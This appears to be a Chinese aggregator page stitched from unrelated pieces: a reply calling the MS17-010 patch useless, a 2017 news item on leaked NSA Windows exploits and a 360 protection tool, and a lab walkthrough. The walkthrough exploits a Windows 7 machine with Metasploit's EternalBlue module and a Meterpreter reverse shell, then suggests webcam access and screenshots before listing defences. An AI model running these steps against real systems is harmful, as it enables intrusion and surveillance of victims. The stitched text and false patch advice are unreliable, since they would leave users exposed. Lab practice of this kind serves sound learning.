前沿拓展:
微軟ms17-010補丁
我的情況和你一樣,重新做系統(tǒng)之后就沒事了,其實這個補丁裝不裝都可以!沒什么作用!
中新網(wǎng)4月20日電 近日美國國家**(NSA)的黑客武器庫遭曝光,其中有多個遠程攻擊Windows系統(tǒng)的武器已在網(wǎng)上公開,任何人都可以使用NSA的武器攻擊其他電腦。對此,360安全衛(wèi)士于4月19日晚間緊急推出“NSA武器庫免疫工具”,可一鍵檢測修復漏洞、關(guān)閉高風險服務(wù),從而全面免疫預防NSA黑客武器。
NSA武器庫免疫工具下載地址:dl.360safe.com/nsa/nsatool.exe
NSA武器庫的公開被稱為是網(wǎng)絡(luò)世界“核彈危機”,其中有十款影響Windows個人用戶的黑客工具,包括永恒之藍、永恒王者、永恒浪漫、永恒協(xié)作、翡翠纖維、古怪地鼠、愛斯基摩卷、文雅學者、日食之翼和尊重審查。這些工具能夠遠程攻破全球約70%的Windows系統(tǒng),無需用戶任何**作,只要聯(lián)網(wǎng)就可以入侵電腦,就像沖擊波、震蕩波等著名蠕蟲一樣可以瞬間血洗互聯(lián)網(wǎng),木馬黑產(chǎn)很可能改造NSA的武器攻擊普通網(wǎng)民。
據(jù)微軟官方回應,NSA武器庫攻擊的Windows系統(tǒng)漏洞已在近期補丁中完成修復。但是對于Windows XP、2003等失去微軟支持的系統(tǒng)版本來說,目前仍處于“裸奔”狀態(tài)。此外,由于漏洞影響全系列Windows版本,沒有及時安裝補丁的Win7、Win8甚至Win10用戶也處于危險之中。
針對不同版本W(wǎng)indows用戶,360“NSA武器庫免疫工具”可以掃描系統(tǒng)環(huán)境,精準檢測出NSA武器庫使用的漏洞是否已經(jīng)修復,并提示用戶安裝相應的補丁。針對XP、2003等無補丁的系統(tǒng)版本用戶,防御工具能夠幫助用戶關(guān)閉存在高危風險的服務(wù),從而對NSA黑客武器攻擊的系統(tǒng)漏洞徹底“免疫”。
1、EternalBlue(永恒之藍):**Bv1漏洞攻擊工具,影響全平臺,已被微軟補丁MS17-010修復。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測修復漏洞,不在支持期的系統(tǒng)可使用360“NSA武器庫免疫工具”進行免疫;
2、EternalChampion(永恒王者):**Bv1漏洞攻擊工具,影響全平臺,已被微軟補丁MS17-010修復。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測修復漏洞,不在支持期的系統(tǒng)可使用360“NSA武器庫免疫工具”進行免疫;
3、EternalRomance(永恒浪漫):**Bv1漏洞攻擊工具,影響全平臺,已被微軟補丁MS17-010修復。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測修復漏洞,不在支持期的系統(tǒng)可使用360“NSA武器庫免疫工具”進行免疫;
4、EternalSynergy(永恒協(xié)作):**Bv3漏洞攻擊工具,影響全平臺,已被微軟補丁MS17-010修復。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測修復漏洞,不在支持期的系統(tǒng)可使用360“NSA武器庫免疫工具”進行免疫;
5、EmeraldThread(翡翠纖維):**Bv1漏洞攻擊工具,影響XP和2003,已被微軟補丁MS10-061修復,相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測修復漏洞;
6、ErraticGopher(古怪地鼠):**B漏洞攻擊工具,影響XP和2003,無補丁,相關(guān)系統(tǒng)用戶可使用360“NSA武器庫免疫工具”進行免疫;
7、EskimoRoll(愛斯基摩卷):Kerberos漏洞攻擊工具,影響2000/2003/2008/2008 R2的域控服務(wù)器,已被微軟補丁MS14-068修復,相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測修復漏洞;
8、EducatedScholar(文雅學者):**B漏洞攻擊工具,影響VISTA和2008,已被微軟補丁MS09-050修復,相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測修復漏洞;
9、EclipsedWing(日食之翼):Server netAPI漏洞攻擊工具,影響2008及之前的所有系統(tǒng)版本,已被微軟補丁MS08-067修復,相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測修復漏洞;
10、EsteemAudit(尊重審查):RDP漏洞遠程攻擊工具,影響XP和2003,無補丁,相關(guān)系統(tǒng)用戶可使用360“NSA武器庫免疫工具”進行免疫。
拓展知識:
微軟ms17-010補丁
(第一次在發(fā)表文章,沒啥經(jīng)驗,分享一些學習經(jīng)驗。大佬們多多包涵,也希望大家能夠指出我的錯誤。)
靶機:windows7 x64 IP:192.168.1.5
攻擊機:Kali Rolling (2019.3) x64 IP:192.168.1.3
兩臺主機在同一網(wǎng)段內(nèi);win7關(guān)閉防火墻并且開啟445端口。
1、使用ipconfig/ifconfig分別查看win7和kali的ip。
2、打開msf工具
每次開啟都會有不同的界面
3、使用search命令搜索ms17_010
4、選擇模塊和設(shè)置條件
使用use來選擇第三個模塊,可以直接 use 2,也可以打全
第二用set來設(shè)置靶機IP set rhost 192.168.1.5
設(shè)置本機IP set lhost 192.168.1.3
設(shè)置**端口 set lport 8888 不設(shè)置則默認4444端口
設(shè)置payload set payload windows/x64/meterpreter/reverse_tcp
還有另外一個payload能用于本實驗,具體可以 show payloads 查看
最后,可以使用show options檢查所有信息
5、開始滲透 run
稍等片刻 看到win則成功創(chuàng)建會話
6、成功之后,可以開啟Windows7的攝像頭,截圖等等
具體可以用help查看
1、關(guān)閉445端口
2、打開防火墻,安裝安全軟件
3、安裝對應補丁,這里就不放鏈接了
關(guān)閉445端口的方法:
1)打開控制面板—-Windows防火墻—-高級設(shè)置
2)點擊新建規(guī)則,設(shè)置端口號的規(guī)則并且命名(如圖)
msf工具雖然強大,但只能用于已知的并且已提交模塊的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻擊。而不是簡單的使用工具use和set。
原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請注明出處:http:///56222.html